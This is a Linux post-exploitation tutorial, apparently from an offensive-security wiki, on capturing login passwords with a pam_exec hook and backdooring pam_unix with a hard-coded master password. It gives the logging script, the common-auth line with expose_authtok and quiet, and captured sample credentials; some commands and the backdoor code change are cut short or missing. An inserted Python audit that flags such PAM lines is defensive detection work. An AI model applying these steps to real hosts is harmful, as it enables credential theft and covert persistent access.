Linux Post-Exploitation

Sniffing Logon Passwords with PAM

Let's configure a PAM module to log the password each user types to log in. If you don't know what PAM is, check:
First, we create a bash script that will be invoked whenever a new authentication occurs.
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
These environment variables are PAM-specific and are made available to the script by the module.
Here is the meaning of the variables:
  • $PAM_USER: The username that was entered.
  • $PAM_RHOST: The remote host (typically the IP address).
  • $(cat -): This reads stdin, which contains the password the script grabs.
  • The results are appended to a log file at /var/log/toomanysecrets.log.
To prevent all users from reading the file, consider pre-creating it and running chmod, e.g.:
sudo touch /var/log/
sudo chmod 770 /var/log/
Next, the PAM configuration file needs to be updated; the pam_exec module will be used to invoke the script.
There are various config files located in /etc/pam.d/, and we pick common-auth.
sudo nano /etc/pam.d/common-auth
On the very bottom of the file, add the following authentication module:
auth optional quiet expose_authtok /usr/local/bin/
The options have the following meaning:
  • optional: Authentication shouldn't fail if there is an error (it's not a required step)
  • pam_exec: This is the living-off-the-land PAM module that can invoke arbitrary scripts
  • expose_authtok: This is the trick that allows the script to read the password via stdin
  • quiet: Don't show any errors to the user (if something doesn't work)
  • The last argument is the shell script that was created previously
Finally, make the file executable:
sudo chmod 700 /usr/local/bin/
Now, let’s try this out and ssh from another machine, or login locally.
And then look at the log file:
$ sudo cat /var/log/toomanysecrets.log
Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From:
Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From:
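The hook above leaves a visible trace in /etc/pam.d: a pam_exec line with expose_authtok, or a module loaded from an unusual path. As an added defensive check that is not part of the original page, the Python audit below parses PAM config lines and flags exactly those patterns; the sample common-auth content and the script path /usr/local/bin/pam-hook.sh are constructed for the example.

```python
import glob
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample of a /etc/pam.d/common-auth with a password-logging
# pam_exec line appended (values made up for this example).
SAMPLE_COMMON_AUTH = """\
# /etc/pam.d/common-auth - authentication settings common to all services
auth    [success=1 default=ignore]  pam_unix.so nullok
auth    requisite                   pam_deny.so
auth    required                    pam_permit.so
auth    optional                    pam_cap.so
auth    optional pam_exec.so quiet expose_authtok /usr/local/bin/pam-hook.sh
"""

# Directories from which distribution PAM modules are normally loaded.
STANDARD_MODULE_DIRS = ("/lib/security/", "/lib64/security/",
                        "/usr/lib/security/", "/usr/lib64/security/")

@dataclass
class Finding:
    line_no: int
    module: str
    script: Optional[str]
    reason: str

def parse_pam_line(line: str) -> Optional[Tuple[str, str, str, List[str]]]:
    """Split a PAM line into (type, control, module, args); a bracketed
    control field such as [success=1 default=ignore] is one token."""
    line = line.split("#", 1)[0].strip()
    m = re.match(r"^(\S+)\s+(\[[^\]]*\]|\S+)\s+(\S+)\s*(.*)$", line)
    if not m:
        return None          # blank, comment, or @include line
    ptype, control, module, rest = m.groups()
    return ptype, control, module, rest.split()

def audit_pam_config(text: str) -> List[Finding]:
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        parsed = parse_pam_line(raw)
        if not parsed:
            continue
        ptype, _control, module, args = parsed
        if module.rsplit("/", 1)[-1] == "pam_exec.so":
            script = next((a for a in args if a.startswith("/")), None)
            if ptype == "auth" and "expose_authtok" in args:
                findings.append(Finding(no, module, script,
                    "pam_exec with expose_authtok: command receives the plaintext password on stdin"))
            else:
                findings.append(Finding(no, module, script, "pam_exec present: review the invoked command"))
        elif "/" in module and not module.startswith(STANDARD_MODULE_DIRS):
            findings.append(Finding(no, module, None, "module loaded from a non-standard path"))
    return findings

if __name__ == "__main__":   # audit a live host: every file under /etc/pam.d
    for path in sorted(glob.glob("/etc/pam.d/*")):
        with open(path, errors="replace") as fh:
            for f in audit_pam_config(fh.read()):
                print(f"{path}:{f.line_no}: {f.reason} ({f.module} {f.script or ''})")
```

A config audit does not catch the modified pam_unix.so described in the next section; for that, compare the installed module against the package checksums (dpkg --verify / rpm -V) or a known-good hash.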

Backdooring PAM

Let's go to the PAM sources (depends on your distro; use the same version number as the one installed) and look around line numbers 170/180 in the pam_unix_auth.c file:
vi modules/pam_unix/pam_unix_auth.c
Let’s change this by:
This will allow any user using the password "0xMitsurugi" to log in.
Recompile pam_unix_auth.c and replace the installed file:
sudo cp \
/home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/ \
You can automate this process with